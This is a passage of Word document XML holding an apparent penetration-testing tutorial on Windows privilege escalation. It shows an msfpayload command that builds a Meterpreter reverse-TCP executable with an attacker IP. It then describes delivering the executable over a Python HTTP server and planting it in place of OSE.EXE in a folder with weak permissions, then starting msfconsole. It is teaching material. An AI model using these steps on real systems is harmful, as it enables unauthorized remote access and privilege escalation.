          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">      Link </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>encap:Ethernet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>HWaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 00:0c:29:11:1e:53 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> addr:192.168.134.135  Bcast:192.168.134.255  Mask:255.255.255.0 inet6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">: fe80::20c:29ff:fe11:1e53/64 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Scope:Link</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1 RX packets:9227 errors:0 dropped:0 overruns:0 frame:0 TX packets:396 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:650604 (650.6 KB)  TX bytes:123409 (123.4 KB) Interrupt:19 Base address:0x2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72481D7F" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A094C9" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>bt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t># cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/exploits/framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@bt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">/exploits/framework# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/reverse\_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.134.135 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">=80 X &gt; exploit.exe Created by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (http://www.metasploit.com). Payload: windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/reverse\_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Length: 290 Options: {"LHOST"=&gt;"192.168.134.135", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">"=&gt;"80"} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@bt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/exploits/framework#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5278C267" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The command </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>on line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> one is simply trying to determine the IP address of our machine (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command) and line 3 states that our attacking IP address is 192.168.134.135, we’ll need this information to create our malicious executable. The next command is on line 12 where you change directories (cd) to the location of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfpayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Line 13 is the most important command which is the actual command we use to create our malicious executable. This command creates a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> are parameters we set when creating the payload. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is from the output of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you can specify any port you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>like,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> you don’t have to include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> because by default it’s 4444. You don’t need to know details about </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:instrText>HYPERLINK "http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> for now think of it as a windows command prompt on steroids. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Finally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> we use the “&gt; exploit.exe” to create the malicious executable in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6CC05" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> get that exploit.exe over to your target windows machine. I’ll leave this up to you but if you run the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00E557B4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          </w:rPr>
          <w:t>python simple http server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t> in that current directory then all you have to do on the windows machine is open up internet explorer put in the IP address of your attack machine and download exploit.exe. Next put exploit.exe into the folder with the weak permissions in this case C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE. You should now have something like this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8DDD84" w14:textId="43DDC36A" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6005F9C0" wp14:editId="479F4318">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2047777402" name="Rectangle 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9AB33" id="Rectangle 7" o:spid="_x0000_s1026" href="http://travisaltman.com/wp-content/beforeExploi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377FAFA" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Next rename the original ose.exe to something different and name exploit.exe to ose.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE4237C" w14:textId="3824DFA2" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604B211A" wp14:editId="1F6671B5">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1308637340" name="Rectangle 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42D20" id="Rectangle 6" o:spid="_x0000_s1026" href="http://travisaltman.com/wp-content/renameExploi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7321DA4" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">So now we’ve replaced the original executable with our malicious executable next we’ll need to fire up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that it can accept our connection once we run our new executable. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> head over to your Linux box and run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8155D" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>root@bt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>/exploits/framework</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>#./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43486322" w14:textId="77777777" w:rsidR="00E557B4" w:rsidRPr="00E557B4" w:rsidRDefault="00E557B4" w:rsidP="00E557B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E557B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>You should now have a “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E557B4">
